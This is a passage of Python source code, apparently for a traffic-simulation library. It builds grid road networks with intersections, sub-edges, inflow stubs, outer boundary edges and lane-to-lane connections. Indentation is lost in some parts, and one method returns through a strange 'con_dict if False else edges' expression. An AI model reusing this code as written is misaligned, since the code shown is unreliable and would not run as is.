        super().__init__(name, vehicles, net_params, persons, initial_config,
                         traffic_lights)
def specify_nodes(self, net_params):
"""Build out the inner nodes of the network.
The inner nodes correspond to the intersections between the roads. They
are numbered from bottom left, increasing first across the columns and
then across the rows.
For example, the nodes in a traffic light grid with 2 rows and 3 columns
would be indexed as follows:
| | |
--- 3 --- 4 --- 5 ---
| | |
--- 0 --- 1 --- 2 ---
| | |
The id of a node is then "center{index}", for instance "center0" for
node 0, "center1" for node 1 etc.
Returns
-------
list <dict>
List of inner nodes
"""
node_type = "traffic_light" if self.use_traffic_lights else "priority"
nodes = []
inserted_nodes = []
for row in range(self.row_num):
for col in range(self.col_num):
nodes.append({
"id": "center{}".format(row * self.col_num + col),
"x": col * self.inner_length,
"y": row * self.inner_length,
"type": node_type,
# "radius": self.inner_nodes_radius
})
inserted_nodes = []
for row in range(self.row_num):
for col in range(self.col_num):
for n in range(self.sub_edge_num - 1):
cur_id = row * self.col_num + col
if col < self.col_num - 1:
inserted_nodes.append({
"id": "{}-{}_{}".format(cur_id, cur_id + 1, n),
"x": col * self.inner_length + self.inner_length * (n + 1) / self.sub_edge_num,
"y": row * self.inner_length,
"type": "priority"
})
if row < self.row_num - 1:
inserted_nodes.append({
"id": "{}-{}_{}".format(cur_id, cur_id + self.col_num, n),
"x": col * self.inner_length,
"y": row * self.inner_length + self.inner_length * (n + 1) / self.sub_edge_num,
"type": "priority"
})
return nodes + inserted_nodes
def specify_edges(self, net_params):
"""Build out the inner edges of the network.
The inner edges are the edges joining the inner nodes to each other.
Consider the following network with n = 2 rows and m = 3 columns,
where the rows are indexed from 0 to 1 and the columns from 0 to 2, and
the inner nodes are marked by 'x':
| | |
(1) ----x-----x-----x----
| | |
(0) ----x-----x-(*)-x----
| | |
(0) (1) (2)
There are n * (m - 1) = 4 horizontal inner edges and (n - 1) * m = 3
vertical inner edges, all that multiplied by two because each edge
consists of two roads going in opposite directions traffic-wise.
On an horizontal edge, the id of the top road is "top{i}_{j}" and the
id of the bottom road is "bot{i}_{j}", where i is the index of the row
where the edge is and j is the index of the column to the right of it.
On a vertical edge, the id of the right road is "right{i}_{j}" and the
id of the left road is "left{i}_{j}", where i is the index of the row
above the edge and j is the index of the column where the edge is.
For example, on edge (*) on row (0): the id of the bottom road (traffic
going from left to right) is "bot0_2" and the id of the top road
(traffic going from right to left) is "top0_2".
Returns
-------
list <dict>
List of inner edges
"""
edges = []
def new_edge(index, from_node, to_node, orientation, lane):
assert from_node != to_node
if from_node < to_node:
node_list = ["center{}".format(from_node)] + ["{}-{}_{}".format(from_node, to_node, n) for n in range(self.sub_edge_num - 1)] + ["center{}".format(to_node)]
else:
node_list = ["center{}".format(from_node)] + ["{}-{}_{}".format(to_node, from_node, n) for n in range(self.sub_edge_num - 2, -1, -1)] + ["center{}".format(to_node)]
new_edges = []
for i, node in enumerate(node_list):
if i + 1 < len(node_list):
new_edges.append({
"id": "{}{}_{}".format(lane, index, i),
"type": orientation,
"priority": 78, # Why 78?
"from": node,
"to": node_list[i + 1],
"length": self.inner_length / self.sub_edge_num
})
return new_edges
# Build the horizontal inner edges
for i in range(self.row_num):
for j in range(self.col_num - 1):
node_index = i * self.col_num + j
index = "{}_{}".format(i, j + 1)
edges += new_edge(index, node_index + 1, node_index,
"horizontal", "top")
edges += new_edge(index, node_index, node_index + 1,
"horizontal", "bot")
# Build the vertical inner edges
for i in range(self.row_num - 1):
for j in range(self.col_num):
node_index = i * self.col_num + j
index = "{}_{}".format(i + 1, j)
edges += new_edge(index, node_index, node_index + self.col_num,
"vertical", "right")
edges += new_edge(index, node_index + self.col_num, node_index,
"vertical", "left")
return edges
def specify_routes(self, net_params):
"""See parent class."""
routes = {}
# conn = self.specify_connections(net_params)
# for node_id in range(self.row_num * self.col_num):
# node_conn = conn['center{}'.format(node_id)]
# for c in node_conn:
# from_edge = c['from']
# target_edge = c['to']
# if from_edge not in routes:
# routes[from_edge] = []
# routes[from_edge].append([[from_edge, target_edge], 1])
# for r in routes:
# l = len(routes[r])
# for i, route in enumerate(routes[r]):
# route[1] = 1. / l
# routes[r][i] = tuple(route)
edges = self.specify_edges(net_params)
for edge in edges:
routes[edge['id']] = [edge['id']]
return routes
def specify_types(self, net_params):
"""See parent class."""
types = [{
"id": "horizontal",
"numLanes": self.horizontal_lanes,
"speed": self.speed_limit["horizontal"]
}, {
"id": "vertical",
"numLanes": self.vertical_lanes,
"speed": self.speed_limit["vertical"]
}]
return types
# ===============================
# ============ UTILS ============
# ===============================
    def specify_connections(self, net_params):
        """Build out connections at each inner node.

        For every allowed (incoming sub-edge, outgoing sub-edge) pair at a
        node, one entry per lane pair is generated in the format used by
        SUMO connection elements:
        {"from": edge id, "to": edge id,
         "fromLane": lane index on the incoming edge,
         "toLane": lane index on the outgoing edge}.

        Returns
        -------
        dict <str, list<dict>>
            maps each inner node id ("center{i}") to its connections
        """
        con_dict = {}

        def new_con(side, from_id, to_id, signal_group, toside=None, from_sub_id=0, to_sub_id=0, inv=False):
            # Build all lane-to-lane connections from edge
            # "{side}{from_id}_{from_sub_id}" to "{toside}{to_id}_{to_sub_id}".
            # `toside` defaults to `side`. When `inv` is True only the
            # innermost lane (highest index) of the incoming edge may
            # connect — used for the U-turn movements below.
            # NOTE(review): `signal_group` is accepted but unused here.
            if toside is None:
                toside = side
            conn = []
            lane1s = range(self.vertical_lanes) if not inv else [self.vertical_lanes - 1]
            for lane1 in lane1s:
                for lane2 in range(self.vertical_lanes):
                    conn.append({
                        "from": side + from_id + "_{}".format(from_sub_id),
                        "to": toside + to_id + "_{}".format(to_sub_id),
                        "fromLane": str(lane1),
                        "toLane": str(lane2),
                    })
            return conn

        # build connections at each inner node
        for node_id in range(self.row_num * self.col_num):
            conn = []
            i = node_id // self.col_num
            j = node_id % self.col_num
            # base ids ("{row}_{col}") of the four inner edges meeting at
            # this node; None when the node lies on that border of the grid
            top_edge_id = "{}_{}".format(i+1, j) if i + 1 < self.row_num else None
            bot_edge_id = "{}_{}".format(i, j) if i > 0 else None
            left_edge_id = "{}_{}".format(i, j) if j > 0 else None
            right_edge_id = "{}_{}".format(i, j+1) if j + 1 < self.col_num else None
            # new_con indexes lanes with vertical_lanes for every edge, so
            # the two lane counts must agree
            assert self.vertical_lanes == self.horizontal_lanes
            # turning movements between each pair of adjacent approaches;
            # from/to sub-edge indices pick the segment closest to the node
            if right_edge_id is not None and top_edge_id is not None:
                conn += new_con('top', right_edge_id, top_edge_id, None, 'right', 0, 0)
                conn += new_con('left', top_edge_id, right_edge_id, None, 'bot', 0, 0)
            if top_edge_id is not None and left_edge_id is not None:
                conn += new_con('left', top_edge_id, left_edge_id, None, 'top', 0, self.sub_edge_num-1)
                conn += new_con('bot', left_edge_id, top_edge_id, None, 'right', self.sub_edge_num-1, 0)
            if bot_edge_id is not None and right_edge_id is not None:
                conn += new_con('right', bot_edge_id, right_edge_id, None, "bot", self.sub_edge_num-1, 0)
                conn += new_con('top', right_edge_id, bot_edge_id, None, "left", 0, self.sub_edge_num-1)
            if bot_edge_id is not None and left_edge_id is not None:
                conn += new_con('right', bot_edge_id, left_edge_id, None, "top", self.sub_edge_num-1, self.sub_edge_num-1)
                conn += new_con('bot', left_edge_id, bot_edge_id, None, "left", self.sub_edge_num-1, self.sub_edge_num-1)
            # straight-through movements (vertical then horizontal)
            if top_edge_id is not None and bot_edge_id is not None:
                conn += new_con('right', bot_edge_id, top_edge_id, 2)
                conn += new_con('left', top_edge_id, bot_edge_id, 2)
            if left_edge_id is not None and right_edge_id is not None:
                conn += new_con('bot', left_edge_id, right_edge_id, 1)
                conn += new_con('top', right_edge_id, left_edge_id, 1)
            # per approach: a U-turn onto the opposite direction of the same
            # edge (innermost lane only, via inv=True), plus connections
            # chaining consecutive sub-edge segments of the same
            # directional edge — presumably the pass-throughs at the
            # inserted sub-edge nodes (TODO confirm)
            if top_edge_id is not None:
                conn += new_con('left', top_edge_id, top_edge_id, None, 'right', 0, 0, True)
                for n in range(self.sub_edge_num - 1):
                    conn += new_con('left', top_edge_id, top_edge_id, None, 'left', n+1, n)
            if bot_edge_id is not None:
                conn += new_con('right', bot_edge_id, bot_edge_id, None, 'left', self.sub_edge_num-1, self.sub_edge_num-1, True)
                for n in range(self.sub_edge_num-1):
                    conn += new_con('right', bot_edge_id, bot_edge_id, None, 'right', n, n+1)
            if left_edge_id is not None:
                conn += new_con('bot', left_edge_id, left_edge_id, None, 'top', self.sub_edge_num-1, self.sub_edge_num-1, True)
                for n in range(self.sub_edge_num-1):
                    conn += new_con('bot', left_edge_id, left_edge_id, None, 'bot', n, n+1)
            if right_edge_id is not None:
                conn += new_con('top', right_edge_id, right_edge_id, None, 'bot', 0, 0, True)
                for n in range(self.sub_edge_num-1):
                    conn += new_con('top', right_edge_id, right_edge_id, None, 'top', n+1, n)
            node_id = "center{}".format(node_id)
            con_dict[node_id] = conn
        return con_dict
# TODO necessary?
def specify_edge_starts(self):
"""See parent class."""
length = 0
edgestarts = []
for edge in self.edges:
# the current edge starts where the last edge ended
edgestarts.append((edge['id'], length))
# increment the total length of the network with the length of the
# current edge
length += float(edge['length'])
return edgestarts
@property
def node_mapping(self):
"""Map nodes to edges.
Returns a list of pairs (node, connected edges) of all inner nodes
and for each of them, the 4 edges that leave this node.
The nodes are listed in alphabetical order, and within that, edges are
listed in order: [bot, right, top, left].
"""
mapping = {}
for node_id in range(self.row_num * self.col_num):
conn = []
i = node_id // self.col_num
j = node_id % self.col_num
top_edge_id = "left{}_{}".format(i+1, j) if i + 1 < self.row_num else None
bot_edge_id = "right{}_{}".format(i, j) if i > 0 else None
left_edge_id = "bot{}_{}".format(i, j) if j > 0 else None
right_edge_id = "top{}_{}".format(i, j+1) if j + 1 < self.col_num else None
node_id = "center{}".format(node_id)
mapping[node_id] = [left_edge_id, bot_edge_id, right_edge_id, top_edge_id]
return sorted(mapping.items(), key=lambda x: x[0])
class GridnxmNetworkInflow(GridnxmNetwork):
    """Grid network with optional inflow/outflow stub edges.

    Extends GridnxmNetwork with short boundary edges through which
    vehicles can enter the grid (and, for 'top_left', also exit it).
    Which stubs exist is controlled by
    ``net_params.additional_params['inflow']``, a collection that may
    contain any of: 'top_left', 'midtop_left', 'midbot_left',
    'top_midleft', 'top_midright'.
    """

    def specify_nodes(self, net_params):
        """Add the boundary nodes anchoring each requested inflow edge."""
        nodes = super().specify_nodes(net_params)
        if 'inflow' in net_params.additional_params:
            inflow = net_params.additional_params['inflow']
            if 'top_left' in inflow:
                # entry node half an edge-length left of the top-left
                # corner, plus an exit node right of the bottom-right corner
                nodes.append({
                    "id": "center_top_left",
                    "x": -.5 * self.inner_length,
                    "y": (self.row_num - 1) * self.inner_length,
                    "type": 'priority',
                })
                nodes.append({
                    "id": "center_bot_right",
                    "x": (self.col_num - 0.5) * self.inner_length,
                    "y": 0.,
                    "type": 'priority',
                })
            if 'midtop_left' in inflow:
                # entry node left of the second row from the top
                nodes.append({
                    "id": "center_midtop_left",
                    "x": -.5 * self.inner_length,
                    "y": (self.row_num - 2) * self.inner_length,
                    "type": 'priority',
                })
            if 'midbot_left' in inflow:
                # entry node left of the third row from the top
                nodes.append({
                    "id": "center_midbot_left",
                    "x": -.5 * self.inner_length,
                    "y": (self.row_num - 3) * self.inner_length,
                    "type": 'priority',
                })
            if 'top_midleft' in inflow:
                # entry node above the second column from the left
                nodes.append({
                    "id": "center_top_midleft",
                    "x": self.inner_length,
                    "y": (self.row_num - 0.5) * self.inner_length,
                    "type": 'priority',
                })
            if 'top_midright' in inflow:
                # entry node above the third column from the left
                nodes.append({
                    "id": "center_top_midright",
                    "x": 2. * self.inner_length,
                    "y": (self.row_num - 0.5) * self.inner_length,
                    "type": 'priority',
                })
        return nodes

    def specify_edges(self, net_params):
        """Add the half-length stub edges for each requested inflow.

        Every stub is half as long as one inner sub-edge and joins a
        boundary node to the nearest intersection node.
        """
        edges = super().specify_edges(net_params)
        if 'inflow' in net_params.additional_params:
            inflow = net_params.additional_params['inflow']
            if 'top_left' in inflow:
                # inflow into the top-left corner and outflow out of the
                # bottom-right corner
                edges.append({
                    "id": "inflow_top_left",
                    "type": 'horizontal',
                    "priority": 78,
                    "from": "center_top_left",
                    "to": "center{}".format((self.row_num - 1) * self.col_num),
                    "length": self.inner_length / self.sub_edge_num / 2
                })
                edges.append({
                    "id": "outflow_bot_right",
                    "type": 'horizontal',
                    "priority": 78,
                    "from": "center{}".format(self.col_num - 1),
                    "to": "center_bot_right",
                    "length": self.inner_length / self.sub_edge_num / 2
                })
            if 'midtop_left' in inflow:
                edges.append({
                    "id": "inflow_midtop_left",
                    "type": "horizontal",
                    "priority": 78,
                    "from": "center_midtop_left",
                    "to": "center{}".format((self.row_num - 2) * self.col_num),
                    "length": self.inner_length / self.sub_edge_num / 2
                })
            if 'midbot_left' in inflow:
                edges.append({
                    "id": "inflow_midbot_left",
                    "type": "horizontal",
                    "priority": 78,
                    "from": "center_midbot_left",
                    "to": "center{}".format((self.row_num - 3) * self.col_num),
                    "length": self.inner_length / self.sub_edge_num / 2
                })
            if 'top_midleft' in inflow:
                edges.append({
                    "id": "inflow_top_midleft",
                    "type": "vertical",
                    "priority": 78,
                    "from": "center_top_midleft",
                    "to": "center{}".format((self.row_num - 1) * self.col_num + 1),
                    "length": self.inner_length / self.sub_edge_num / 2
                })
            if 'top_midright' in inflow:
                edges.append({
                    "id": "inflow_top_midright",
                    "type": "vertical",
                    "priority": 78,
                    "from": "center_top_midright",
                    "to": "center{}".format((self.row_num - 1) * self.col_num + 2),
                    "length": self.inner_length / self.sub_edge_num / 2
                })
        return con_dict if False else edges

    def specify_connections(self, net_params):
        """Connect each stub edge to the inner edges at its intersection.

        Each inflow stub gets lane-0-to-lane-0 connections onto the two
        inner roads leaving its intersection (one downward "left..." road
        and one rightward "bot..." road).
        """
        con_dict = super().specify_connections(net_params)
        if 'inflow' in net_params.additional_params:
            inflow = net_params.additional_params['inflow']
            if 'top_left' in inflow:
                node_id = "center{}".format((self.row_num - 1) * self.col_num)
                con_dict[node_id].append({
                    "from": 'inflow_top_left',
                    "to": 'left{}_0_0'.format(self.row_num - 1),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
                con_dict[node_id].append({
                    "from": 'inflow_top_left',
                    "to": 'bot{}_1_0'.format(self.row_num - 1),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
                # NOTE(review): the two outflow connections below involve
                # edges at the bottom-right corner but are stored under the
                # top-left node's key — verify this grouping is intended.
                con_dict[node_id].append({
                    "from": 'bot0_{}_0'.format(self.col_num - 1),
                    "to": 'outflow_bot_right',
                    "fromLane": str(0),
                    "toLane": str(0),
                })
                con_dict[node_id].append({
                    "from": 'left1_{}_0'.format(self.row_num - 1),
                    "to": 'outflow_bot_right',
                    "fromLane": str(0),
                    "toLane": str(0),
                })
            if 'midtop_left' in inflow:
                node_id = "center{}".format((self.row_num - 2) * self.col_num)
                con_dict[node_id].append({
                    "from": 'inflow_midtop_left',
                    "to": 'left{}_0_0'.format(self.row_num - 2),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
                con_dict[node_id].append({
                    "from": 'inflow_midtop_left',
                    "to": 'bot{}_1_0'.format(self.row_num - 2),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
            if 'midbot_left' in inflow:
                node_id = "center{}".format((self.row_num - 3) * self.col_num)
                con_dict[node_id].append({
                    "from": 'inflow_midbot_left',
                    "to": 'left{}_0_0'.format(self.row_num - 3),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
                con_dict[node_id].append({
                    "from": 'inflow_midbot_left',
                    "to": 'bot{}_1_0'.format(self.row_num - 3),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
            if 'top_midleft' in inflow:
                node_id = "center{}".format((self.row_num - 1) * self.col_num + 1)
                con_dict[node_id].append({
                    "from": 'inflow_top_midleft',
                    "to": 'left{}_1_0'.format(self.row_num - 1),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
                con_dict[node_id].append({
                    "from": 'inflow_top_midleft',
                    "to": 'bot{}_2_0'.format(self.row_num - 1),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
            if 'top_midright' in inflow:
                node_id = "center{}".format((self.row_num - 1) * self.col_num + 2)
                con_dict[node_id].append({
                    "from": 'inflow_top_midright',
                    "to": 'left{}_2_0'.format(self.row_num - 1),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
                con_dict[node_id].append({
                    "from": 'inflow_top_midright',
                    "to": 'bot{}_3_0'.format(self.row_num - 1),
                    "fromLane": str(0),
                    "toLane": str(0),
                })
        return con_dict
class GridnxmNetworkExpand(GridnxmNetwork):
    """Grid network expanded with outer (boundary) nodes and edges.

    Extends GridnxmNetwork with an in/out node pair and an in/out edge
    pair at every extremity of every row and column, so vehicles can
    enter and leave the grid on all four sides. Requires
    "outer_length" in the "grid_array" net parameter.
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # outer_length is mandatory for this variant (the parent treats it
        # as optional and may leave it None)
        self.outer_length = self.grid_array['outer_length']

    @property
    def _outer_nodes(self):
        """Build out the outer nodes of the network.

        The outer nodes correspond to the extremities of the roads. There
        are two at each extremity, one where the vehicles enter the network
        (inflow) and one where the vehicles exit the network (outflow).

        On row i, the two left-extremity nodes are "left_row_in{i}" and
        "left_row_out{i}", and the two right-extremity nodes are
        "right_row_in{i}" and "right_row_out{i}". On column j, the bottom
        nodes are "bot_col_in{j}" / "bot_col_out{j}" and the top nodes are
        "top_col_in{j}" / "top_col_out{j}". The "in" nodes are where
        vehicles enter, the "out" nodes where they exit.

        Returns
        -------
        list <dict>
            List of outer nodes
        """
        nodes = []

        def new_node(x, y, name, i):
            # every outer node is a plain priority node
            return [{"id": name + str(i), "x": x, "y": y, "type": "priority"}]

        # build nodes at the extremities of columns (in/out pairs share the
        # same coordinates)
        for col in range(self.col_num):
            x = col * self.inner_length
            y = (self.row_num - 1) * self.inner_length
            nodes += new_node(x, - self.outer_length, "bot_col_in", col)
            nodes += new_node(x, - self.outer_length, "bot_col_out", col)
            nodes += new_node(x, y + self.outer_length, "top_col_in", col)
            nodes += new_node(x, y + self.outer_length, "top_col_out", col)

        # build nodes at the extremities of rows
        for row in range(self.row_num):
            x = (self.col_num - 1) * self.inner_length
            y = row * self.inner_length
            nodes += new_node(- self.outer_length, y, "left_row_in", row)
            nodes += new_node(- self.outer_length, y, "left_row_out", row)
            nodes += new_node(x + self.outer_length, y, "right_row_in", row)
            nodes += new_node(x + self.outer_length, y, "right_row_out", row)

        return nodes

    @property
    def _outer_edges(self):
        """Build out the outer edges of the network.

        The outer edges join the border intersections to the outer nodes.

        On row i, the four horizontal outer edges are labeled
        "in_bot{i}_0" / "out_top{i}_0" (left side) and "out_bot{i}_{m}" /
        "in_top{i}_{m}" (right side). On column j, the four vertical outer
        edges are "out_left0_{j}" / "in_right0_{j}" (bottom) and
        "in_left{n}_{j}" / "out_right{n}_{j}" (top). Edges labeled "in"
        carry entering traffic, "out" edges carry exiting traffic.

        Returns
        -------
        list <dict>
            List of outer edges
        """
        edges = []

        def new_edge(index, from_node, to_node, orientation, length):
            return [{
                "id": index,
                "type": {"v": "vertical", "h": "horizontal"}[orientation],
                "priority": 78,
                "from": from_node,
                "to": to_node,
                "length": length
            }]

        for i in range(self.col_num):
            # bottom edges
            id1 = "in_right0_{}".format(i)
            id2 = "out_left0_{}".format(i)
            node1 = "bot_col_in{}".format(i)
            node2 = "center{}".format(i)
            node3 = "bot_col_out{}".format(i)
            edges += new_edge(id1, node1, node2, "v", self.outer_length)
            edges += new_edge(id2, node2, node3, "v", self.outer_length)
            # top edges
            id1 = "in_left{}_{}".format(self.row_num, i)
            id2 = "out_right{}_{}".format(self.row_num, i)
            node1 = "top_col_in{}".format(i)
            node2 = "center{}".format((self.row_num - 1) * self.col_num + i)
            node3 = "top_col_out{}".format(i)
            edges += new_edge(id1, node1, node2, "v", self.outer_length)
            edges += new_edge(id2, node2, node3, "v", self.outer_length)

        for j in range(self.row_num):
            # left edges
            id1 = "in_bot{}_0".format(j)
            id2 = "out_top{}_0".format(j)
            node1 = "left_row_in{}".format(j)
            node2 = "center{}".format(j * self.col_num)
            node3 = "left_row_out{}".format(j)
            edges += new_edge(id1, node1, node2, "h", self.outer_length)
            edges += new_edge(id2, node2, node3, "h", self.outer_length)
            # right edges
            id1 = "in_top{}_{}".format(j, self.col_num)
            id2 = "out_bot{}_{}".format(j, self.col_num)
            node1 = "right_row_in{}".format(j)
            node2 = "center{}".format((j + 1) * self.col_num - 1)
            node3 = "right_row_out{}".format(j)
            edges += new_edge(id1, node1, node2, "h", self.outer_length)
            edges += new_edge(id2, node2, node3, "h", self.outer_length)

        return edges

    def specify_nodes(self, net_params):
        """See parent class; appends the outer boundary nodes."""
        inner_nodes = super().specify_nodes(net_params)
        return inner_nodes + self._outer_nodes

    def specify_edges(self, net_params):
        """See parent class; appends the outer boundary edges."""
        inner_edges = super().specify_edges(net_params)
        return inner_edges + self._outer_edges

    def specify_connections(self, net_params):
        """Build out connections at each inner node.

        Extends the parent's inner-node connections with the movements
        between the inner edges and the outer in/out stub edges on the
        border nodes. Corner nodes get the richest set (two inner and
        four outer approaches); other border nodes get a smaller set.
        """
        con_dict = super().specify_connections(net_params)

        def new_con(side, from_id, to_id, toside, from_sub_id=None, to_sub_id=None):
            # One lane-to-lane connection per lane pair from edge
            # "{side}{from_id}[_{from_sub_id}]" to
            # "{toside}{to_id}[_{to_sub_id}]"; sub-edge suffixes are only
            # appended when a sub-id is given (outer edges carry none).
            # "out" edges may only be targets and "in" edges only sources.
            assert "out" not in side
            assert "in" not in toside
            lane1s = range(self.vertical_lanes)
            lane2s = range(self.vertical_lanes)
            conn = []
            # NOTE(review): lane1s is re-assigned identically here; the
            # line above is redundant but harmless.
            lane1s = range(self.vertical_lanes)
            for lane1 in lane1s:
                for lane2 in lane2s:
                    conn.append({
                        "from": side + from_id + "_{}".format(from_sub_id) if from_sub_id is not None else side + from_id,
                        "to": toside + to_id + "_{}".format(to_sub_id) if to_sub_id is not None else toside + to_id,
                        "fromLane": str(lane1),
                        "toLane": str(lane2),
                    })
            return conn

        # build connections at each inner node
        for node_id in range(self.row_num * self.col_num):
            conn = []
            i = node_id // self.col_num
            j = node_id % self.col_num
            # with outer edges present, all four edge ids exist at every
            # node (no border None-checks needed here)
            top_edge_id = "{}_{}".format(i+1, j)
            bot_edge_id = "{}_{}".format(i, j)
            left_edge_id = "{}_{}".format(i, j)
            right_edge_id = "{}_{}".format(i, j+1)
            # new_con indexes lanes with vertical_lanes for every edge
            assert self.vertical_lanes == self.horizontal_lanes
            # bottom left
            if i == 0 and j == 0:
                conn += new_con("in_right", bot_edge_id, top_edge_id, "right", to_sub_id=0)
                conn += new_con("left", top_edge_id, bot_edge_id, "out_left", from_sub_id=0)
                conn += new_con("in_bot", left_edge_id, right_edge_id, "bot", to_sub_id=0)
                conn += new_con("top", right_edge_id, left_edge_id, "out_top", from_sub_id=0)
                conn += new_con('in_bot', left_edge_id, top_edge_id, "right", to_sub_id=0)
                conn += new_con('left', top_edge_id, left_edge_id, 'out_top', from_sub_id=0)
                conn += new_con("in_right", bot_edge_id, right_edge_id, "bot", to_sub_id=0)
                conn += new_con("top", right_edge_id, bot_edge_id, "out_left", from_sub_id=0)
                conn += new_con("in_bot", left_edge_id, bot_edge_id, "out_left")
                conn += new_con("in_right", bot_edge_id, left_edge_id, "out_top")
            # bottom right
            elif i == 0 and j + 1 == self.col_num:
                conn += new_con("in_right", bot_edge_id, top_edge_id, "right", to_sub_id=0)
                conn += new_con("left", top_edge_id, bot_edge_id, "out_left", from_sub_id=0)
                conn += new_con("bot", left_edge_id, right_edge_id, "out_bot", from_sub_id=0)
                conn += new_con("in_top", right_edge_id, left_edge_id, "top", to_sub_id=0)
                conn += new_con('in_top', right_edge_id, top_edge_id, "right", to_sub_id=0)
                conn += new_con('left', top_edge_id, right_edge_id, 'out_bot', from_sub_id=0)
                conn += new_con("bot", left_edge_id, bot_edge_id, "out_left", from_sub_id=self.sub_edge_num-1)
                conn += new_con("in_right", bot_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
                conn += new_con("in_right", bot_edge_id, right_edge_id, "out_bot")
                conn += new_con("in_top", right_edge_id, bot_edge_id, "out_left")
            # top left
            elif i + 1 == self.row_num and j == 0:
                conn += new_con("right", bot_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
                conn += new_con("in_left", top_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
                conn += new_con("in_bot", left_edge_id, right_edge_id, "bot", to_sub_id=0)
                conn += new_con("top", right_edge_id, left_edge_id, "out_top", from_sub_id=0)
                conn += new_con("in_left", top_edge_id, right_edge_id, "bot", to_sub_id=0)
                conn += new_con("top", right_edge_id, top_edge_id, "out_right", from_sub_id=0)
                conn += new_con("in_bot", left_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
                conn += new_con("right", bot_edge_id, left_edge_id, "out_top", from_sub_id=self.sub_edge_num-1)
                conn += new_con('in_bot', left_edge_id, top_edge_id, "out_right")
                conn += new_con('in_left', top_edge_id, left_edge_id, "out_top")
            # top right
            elif i + 1 == self.row_num and j + 1 == self.col_num:
                conn += new_con("right", bot_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
                conn += new_con("in_left", top_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
                conn += new_con("bot", left_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
                conn += new_con("in_top", right_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
                conn += new_con("in_top", right_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
                conn += new_con("right", bot_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
                conn += new_con('bot', left_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
                conn += new_con('in_left', top_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
                conn += new_con("in_left", top_edge_id, right_edge_id, "out_bot")
                conn += new_con("in_top", right_edge_id, top_edge_id, "out_right")
            # bot
            elif i == 0:
                conn += new_con("in_right", bot_edge_id, top_edge_id, "right", to_sub_id=0)
                conn += new_con("left", top_edge_id, bot_edge_id, "out_left", from_sub_id=0)
                conn += new_con("in_right", bot_edge_id, right_edge_id, "bot", to_sub_id=0)
                conn += new_con("top", right_edge_id, bot_edge_id, "out_left", from_sub_id=0)
                conn += new_con("bot", left_edge_id, bot_edge_id, "out_left", from_sub_id=self.sub_edge_num-1)
                conn += new_con("in_right", bot_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
            # left
            elif j == 0:
                conn += new_con("in_bot", left_edge_id, right_edge_id, "bot", to_sub_id=0)
                conn += new_con("top", right_edge_id, left_edge_id, "out_top", from_sub_id=0)
                conn += new_con('in_bot', left_edge_id, top_edge_id, "right", to_sub_id=0)
                conn += new_con('left', top_edge_id, left_edge_id, 'out_top', from_sub_id=0)
                conn += new_con("in_bot", left_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
                conn += new_con("right", bot_edge_id, left_edge_id, "out_top", from_sub_id=self.sub_edge_num-1)
            # top
            elif i + 1 == self.row_num:
                conn += new_con("right", bot_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
                conn += new_con("in_left", top_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
                conn += new_con("in_left", top_edge_id, right_edge_id, "bot", to_sub_id=0)
                conn += new_con("top", right_edge_id, top_edge_id, "out_right", from_sub_id=0)
                conn += new_con('bot', left_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
                conn += new_con('in_left', top_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
            # right
            elif j + 1 == self.col_num:
                conn += new_con("bot", left_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
                conn += new_con("in_top", right_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
                conn += new_con("in_top", right_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
                conn += new_con("right", bot_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
                conn += new_con("left", top_edge_id, right_edge_id, "out_bot", from_sub_id=0)
                conn += new_con("in_top", right_edge_id, top_edge_id, "right", to_sub_id=0)
            node_id = "center{}".format(node_id)
            con_dict[node_id] += conn
        return con_dict
class GridnxmNetworkExpand_with_Index(Network):
"""Traffic Light Grid network class.
The traffic light grid network consists of m vertical lanes and n
horizontal lanes, with a total of nxm intersections where the vertical
and horizontal edges meet.
Requires from net_params:
* **grid_array** : dictionary of grid array data, with the following keys
* **row_num** : number of horizontal rows of edges
* **col_num** : number of vertical columns of edges
* **inner_length** : length of inner edges in traffic light grid network
* **horizontal_lanes** : number of lanes in the horizontal edges
* **vertical_lanes** : number of lanes in the vertical edges
* **speed_limit** : speed limit for all edges. This may be represented as a
float value, or a dictionary with separate values for vertical and
horizontal lanes.
"""
def __init__(self,
name,
vehicles,
net_params,
persons=PersonParams(),
initial_config=InitialConfig(),
traffic_lights=TrafficLightParams()):
"""Initialize an n*m traffic light grid network."""
optional = ["tl_logic", "outer_length"]
for p in ADDITIONAL_NET_PARAMS.keys():
if p not in net_params.additional_params and p not in optional:
raise KeyError('Network parameter "{}" not supplied'.format(p))
for p in ADDITIONAL_NET_PARAMS["grid_array"].keys():
if p not in net_params.additional_params["grid_array"] and p not in optional:
raise KeyError(
'Grid array parameter "{}" not supplied'.format(p))
# retrieve all additional parameters
